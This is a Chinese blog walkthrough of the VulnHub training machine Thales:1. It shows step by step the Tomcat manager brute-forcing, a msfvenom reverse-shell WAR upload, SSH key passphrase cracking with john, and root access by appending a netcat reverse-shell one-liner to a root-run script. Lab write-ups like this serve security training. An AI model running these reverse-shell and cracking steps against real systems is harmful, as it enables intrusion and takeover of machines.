vulnhub靶机Thales:1

最新推荐文章于 2024-08-20 20:55:28 发布
最新推荐文章于 2024-08-20 20:55:28 发布
阅读量272 收藏
点赞数
分类专栏: vulnhub 文章标签: 网络安全 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/131878997
版权

Thales:1

靶机地址:Thales: 1 ~ VulnHub

主机发现

arp-scan -l

扫描端口

nmap --min-rate 10000 -p- 192.168.21.135

nmap -sV -sT -O -p22,8080 192.168.21.135

简单的漏洞的扫描

nmap --script=vuln -p22,8080 192.168.21.135

答题思路就是从8080端口拿到账号密码,再从22端口远程登入,提权就能结束

当然先看看8080端口

解决登入问题

search tomcat login

use auxiliary/scanner/http/tomcat_mgr_login

配置RHOSTS即可

Set RHOSTS 192.168.21.135

tomcat:role1

后台到手

接下来需要整一个木马了

use payload/java/jsp_shell_reverse_tcp

知道信息了制作木马(别用数字)(后来换成了shell)

msfvenom -p java/shell/reverse_tcp lhost=192.168.21.131 lport=666 -f war -o shell.war

上传就可以,点击server status

进入list application能上传文件

记得监听

Nc -lvp 666

访问网页

是 python3 ,写入交互式shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

可以升级一下 shell

查看一下权限:

不是之前发现的密码,那就看一下其他的信息:

在 /home 目录下发现了一些信息:

发现 backup.sh 文件可以运行系统指令:

user.txt 文件没有权限查看,除此之外还发现了 .ssh 文件夹:

发现有私钥,那就可以用 ssh2john.py 生成密码文件然后爆破,保存秘钥到本地:

用 ssh2john.py 脚本编译一下:

/usr/share/john/ssh2john.py id_rsa > crack.txt

爆破:

john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

解得密码为:vodka06

3.收集用户 thales 的信息

在 nc 连接的 tomcat 中切换 thales 用户:

切换成功,查看一下 /home 目录下的信息:

user.txt 文件中有字符串,md5解码:

能解出,要收费,先看 notes.txt 文件中的信息,刚才发现也没有利用:

可以看出是root运行的,查看文件权限:

发现我们读写执行都可以。

三、提权

在其中添加反弹shell(一些反弹shell可以参考 pentestmonkey 网站上的):

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.129 1235 >/tmp/f" >> backup.sh

监听端口

 

拿到了root用户

himobrinehacken
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶场之THALES: 1
「 虚幻私塾」
10-30 757
在.ssh下发现密匙:id_rsa文件,将密匙文件复制保存到本地文件upfine,然后命令:python2 /usr/share/john/ssh2john.py /home/kali/Desktop/upfine > passwd生成密码本,然后命令:john --wordlist=/usr/share/wordlists/rockyou.txt passwd进行破解,成功获取密码:vodka06。切换thales账户:su thales,读取下user.txt文件,成功获取到flag信息。
vulnhub靶机-THALES: 1
臭nana的博客
03-18 4616
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录 可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...
Vulnhub靶场】THALES: 1
DG_s1mple
03-17 3072
环境准备 下载靶机导入到vmware 信息收集 我们使用arp-scan命令查找靶机的IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.17 我们使用nmap扫描靶机开启的服务 发现靶机开放了tomcat和ssh,我们先访问他的tomcat 渗透开始 tomcat发现可以登录,我们尝试爆破一下 成功爆破出账号密码,我们返回网站登录 发现manager app页面可以上传文件 我们使用如下命令创建一个反弹shell的木马上传 msfvenom -p ja
Vulnhub项目:Thales:1
Ays.Ie的博客
05-30 773
Vulnhub项目:Thales:1
Vulnhub——THALES: 1靶场
Re1_zf的博客
11-15 826
1、msfvenom生成反弹shell的war文件2、python脚本转换公钥文件为JTR攻击兼容文件python3 ssh2john.py 需要处理的文件 > 输出的文件3、john爆破ssh公钥(基于JTR攻击兼容文件)john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件4、利用mkfifo命令实现权限维持mkfifo创建的是一个管道文件,这里这种情况下这个文件中的内容会实时更新,即输入的命令会被实时读取。
Vulnhub靶场】THALES:1
Nailaoyyds的博客
07-05 1152
目录前言描述一、信息收集0x00 arp-scan扫描0x01 nmap扫描二、漏洞利用0x00 msfconsole利用0x01 文件上传三、权限提升0x00 反弹shell0x02 字典爆破​编辑0x03 user.txt0x04 反弹shell0x05 root.txt总结 arp-scan -I eth1 -l #扫描网卡局域网 扫描到两个网段 不确定是哪个 nmap 扫描扫描两个IP 开放端口22和8080 访问站点,发现需要用户名密码 msf搜索tomcat login 配置pay
Vulnhub: Thales:1靶机
qq_43884092的博客
06-18 115
tomcat爆破后台账号密码,计划任务提权
Vulnhub-thales靶机
lionwerson的博客
12-03 764
thales下载地址https://download.vulnhub.com/thales/Thales.zip1.导入virtual box,网络改为桥接模式,打开虚拟机。 2.nmap扫描一下端口: 开放了8080端口和22端口。 3.浏览器打开8080端口: 服务是tomcat,版本是9.0.52,没有任意文件读取和写入的漏洞,只能爆破manager app认证 4.burp认证爆破,tomcat的账号和密码格式是【用户名:密码】然后经过base64加密进行发送: ..
vulhub thales:1 靶场
GRXHunter的博客
04-12 3456
vulhub thales:1靶场
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8400
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 604
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 463
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
最新发布
一点硬件
08-20 105
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值